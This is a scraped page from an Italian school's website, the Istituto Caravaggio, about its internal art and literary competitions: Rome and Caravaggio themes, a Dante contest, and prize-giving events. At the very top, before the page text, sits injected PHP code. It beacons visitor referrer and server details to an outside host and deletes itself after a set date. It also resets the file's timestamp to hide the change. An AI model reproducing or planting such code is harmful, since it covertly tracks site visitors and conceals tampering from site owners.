check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Concorsi interni ed esterni
Get Adobe Flash player

Nuovo sito

nuovosito 1

Concorsi interni ed esterni

 IL CARAVAGGIO “CON-CORRE”

 

di Francesca Bottari

   

 Da due anni promuoviamo concorsi interni a tema, che mirino a stimolare e a promuovere l’attività inventiva, creativa ed espressiva della nostra scolaresca, con la convinta intenzione di coinvolgere tutte e tre le anime del nostro Istituto, non soltanto gli studenti che hanno scelto l’indirizzo artistico. E confidiamo nel fatto che i tre corsi aderiscano con crescente entusiasmo. Anche perchè i premi che abbiamo definito sono tutt’altro che simbolici!

 Siamo infatti persuasi che lavorare a un tema comune solletichi negli studenti l’immaginazione, muova il loro estro e indirizzi la loro creatività (nel rigore della progettazione guidata dai docenti) verso un’espressione compiuta. E che questo sia il modo migliore, più allegro e sentito, per partecipare a un progetto collettivo, accrescendo le possibilità di amicizia e condivisione. 

 A conclusione dell’attività espressiva, e dopo le selezioni dei lavori operate da una giuria interna ed esterna, la scuola organizza un evento  di fine anno aperto al territorio, alle famiglie e agli Enti patrocinanti, che include la premiazione dei giovani artisti, una mostra delle migliori opere e altre iniziative di festa.  

 

Feedback del progetto 2010-2011

 Quale il tema proposto?

Il tema prescelto nell’anno scorso – Roma tra passato e presente - ha spinto gli studenti a lavorare sulla loro città. Un argomento che sapevamo essere molto vasto, ma che chiedevamo loro di affrontare  in senso sia diacronico (Roma dall’antico a oggi) sia anche sincronico, nella prospettiva di analisi delle realtà attuali e delle potenzialità del linguaggio contemporaneo.

 Il tema della riflessione del passato per capire meglio il presente sostanzia la formazione che vogliamo garantire ai nostri studenti e nella quale fermamente crediamo. Poiché dall’arte – con gioia e semplicità – è più naturale passare a comprendere molto del mondo e delle relazioni sociali che lo abitano. Della necessità di vivere in un luogo bello e sensato, che dia spazio al passato senza rinunciare a un progresso sostenibile.

Che aiuti ad affrontare senza pregiudizi sia le diversità che i più evidenti conflitti, personali e sociali.

 Come hanno risposto gli studenti?

Nel primo anno, sperimentale per forza di cose, la scolaresca ha risposto solo in parte, specie quelle classi sollecitate e aiutate dai docenti. Contiamo, per la nuova edizione, di coinvolgere più studenti possibile.

Come sempre i più giovani, se istituzionalmente chiamati a progettare in piena libertà, rispondono in modo tutt’altro che trasgressivo. È un dato, questo, che dovrebbe farci riflettere tutti…!  Buona parte dei lavori proposti, infatti, sono stati a carattere figurativo.

Molte le tecniche – tra pittura su tela, su tavola, acrilici e tempere, acquerelli e tratto grafico, collage e stencil, carte fotografiche – e moltissime le suggestioni.

Roma s’è fatta, così, teatro delle loro curiosità e delle loro osservazioni.

Il tratto ricorrente dei lavori presentati, convenzionali nella stesura pittorica ma originali nella resa tematica – è stato quello dell’affiancamento, non del contrasto drammatico, in cui un elemento prevalesse sull’altro.

Una pluralità felice, insomma, più che un conflitto tra antico e moderno.

 Abbiamo, così, visto e selezionato statue e fontane barocche intrecciate ad architetture razionaliste – in questa zona così familiare per chi vi abita – edifici monumentali e chiese sovrapporsi a ponti moderni e installazioni museali.

 

 Per quest’anno e per quel che verrà …

 

Concorso dal titolo Perduranti suggestioni caravaggesche nella Roma del XXI secolo

 

Come appare dal bando altrove riportato, la proposta di quest’anno tende da un lato a restringere il campo di ricerca, ma dall’altro a … volare più in alto. Come sono parallelamente decollati i premi finali, con cui vogliamo incentivare i nostri ragazzi a mettersi all’opera.

Se il titolo può apparire un po’ austero e altisonante, l’idea portante crediamo sia invece alla portata di tutti.

Nessuno chiede, infatti, agli studenti di misurarsi con il Maestro cui è ormai intitolato l’Istituto, ma solo di attestare - con la riflessione, l’osservazione e l’impegno ideativo – quanto alcuni tratti fondanti del linguaggio caravaggesco – da noi individuati nel naturalismo militante, nel drammatico confronto col vero come dovere etico e nell’occhio amorevole e intriso di religiosità rivolto al presente – abbiano ancora senso nell’oggi e continuino a fare da stimolo alla riflessione e all’indagine conoscitiva ed espressiva.

 La domanda, ai nostri occhi, ha un valore retorico e pedagogico. Quindi confidiamo tutti in una risposta che incoraggi l’esplicita fiducia verso la creatività e l’autenticità dei nostri studenti.

 A conforto del lavoro conoscitivo e progettuale delle classi che intendono partecipare al concorso 2011-2012 l’Istituto sta organizzando alcune lezioni propedeutiche di carattere generale su Caravaggio e un incontro seminariale di due ore su questioni metodologiche relative all’analisi delle sue controverse opere.

 

CONCORSO NAZIONALE  “ ARTE DEGLI OPPOSTI ”   a.s. 2012/2013

Progetto a cura della Prof.ssa  Maria Paola Asdrubali

 

Premiazione

mafai_ico

 

CONCORSO "NOI e DANTE" a.s. 2012/2013 - Progetto a cura dei docenti

 Maria Tesesa Ciammaruconi  e  Pasqualina Marini

 

Premiazione

mafai_ico

 

Locandina

mafai_ico

 

Manifesto

mafai_ico

 

CONCORSO ARTI VISIVE a.s. 2011/2012 - Progetto a cura dei docenti

 Francesca Bottari e Pasqualina Marini

 

Opere premiate

mafai_ico

 

La Vocazione -  per una migliore definizione del video: www.vimeo.com

mafai_ico

 

Catalogo ragionato opere in mostra

mafai_ico

 

Opere in mostra e premiazione

mafai_ico

 

CONCORSO ARTI VISIVE a.s. 2011/2012

Perduranti suggestioni caravaggesche nella Roma del XXI secolo

mafai_ico

 

Bando del concorso

mafai_ico

 

CONCORSO ARTI VISIVE a.s. 2010/2011 - Progetto a cura dei docenti

Elia Laura De Santis e Giovanni Cuocolo

 

CONCORSO ARTI VISIVE a.s. 2010/2011

Roma attraverso la sua storia e i suoi contrasti

mafai_ico

 

Presentazione della mostra e premiazione

mafai_ico

 

 

Un concorso di idee per un sito tutto nostro

 

In un Istituto che fonde tre scuole e si nutre della loro stessa varietà, i concorsi interni - oltre che quelli proposti dagli  enti esterni e cui tradizionalmente si partecipa - diventano motivo di aggregazione, di confronto tra corsi diversi, di amicizia e gioiosa competitività.

In tal senso il liceo artistico ha un certo background, poiché in passato sono state spesso promosse iniziative e gare interne per la realizzazione di loghi, di sigle, di immagini rappresentative ed esemplari o altro, che raccontassero l'esperienza creativa sperimentata nella scuola.   

Le mostre di fine anno, inoltre, sono per noi la vetrina finale con cui valutiamo l'efficacia del lavoro svolto. O il diverso cammino che vogliamo avviare.

Nel nuovo corso integrato che l'Istituto Caravaggio si appresta a intraprendere vogliamo che i concorsi siano ancor più aggreganti.  Abbiamo già sperimentato piccole forme di confronto e collaborazione, tra cui un'esperienza di scrittura e illustrazione tra liceo scientifico e artistico  di grande interesse. Ma l'obiettivo è quello di standardizzare tali forme di lavoro, al fine di rendere ogni diversità tra scelte di studio una risorsa e ogni competizione un confronto arricchente.

Anche questo sito nasce da una sperimentazione.  Non abbiamo voluto appaltarlo, ma tentare da soli di raccontarvi la nostra storia in modo semplice, diretto e comprensibile. Anche a costo di apparire meno sofisticati di tanti altri.

Anch'esso deve essere un agone produttivo di confronto e sperimentazione.

Il banner - la barra illustrativa - che oggi esibiamo è stato progettato dagli studenti. E non è che l'inizio di un lavoro collettivo.

Chiediamo alla comunità studentesca e ai docenti che la guidano, di far confluire tutte le loro idee sul sito.

La valanga di suggestioni, proposte e soluzioni che ci attendiamo sarà il tema del nostro concorso d'Istituto 2011-2012

FB

Docente di Discipline pittoriche: Prof.ssa Marina Paris

 

Anno scolastico 2010/2011 - Classe Terza e Quarta sez. F

mafai_ico

Allegati:
FileDescrizioneDimensione del File
Scarica questo file (BANDO CONCORSO.pdf)Concorso arte cultura creatività progettualità 85 Kb
Scarica questo file (Vincitori del concorso NOI eDANTE.pdf)Vincitori del concorso "Noi e Dante" 167 Kb
Scarica questo file (LOCANDINA gialla finale.pdf)Concorso "Noi e Dante"Locandina434 Kb
Scarica questo file (BANDO di CONCORSO Noi e Dante.pdf)"Noi e Dante"Bando di Concorso367 Kb
Scarica questo file (Noi e Dante (medie).pdf)"Noi e Dante"Concorso riservato agli alunni delle Scuole Medie inferiori427 Kb
Scarica questo file (ARTI_VISIVE_2012_1.pdf)Concorso Arti Visive - a.s. 2011/2012Locandina4477 Kb
Scarica questo file (Concorso_arti_visive[2012].pdf)Concorso Arti Visive - a.s. 2011/2012Perduranti suggestioni caravaggesche nella Roma del XXI sec.172 Kb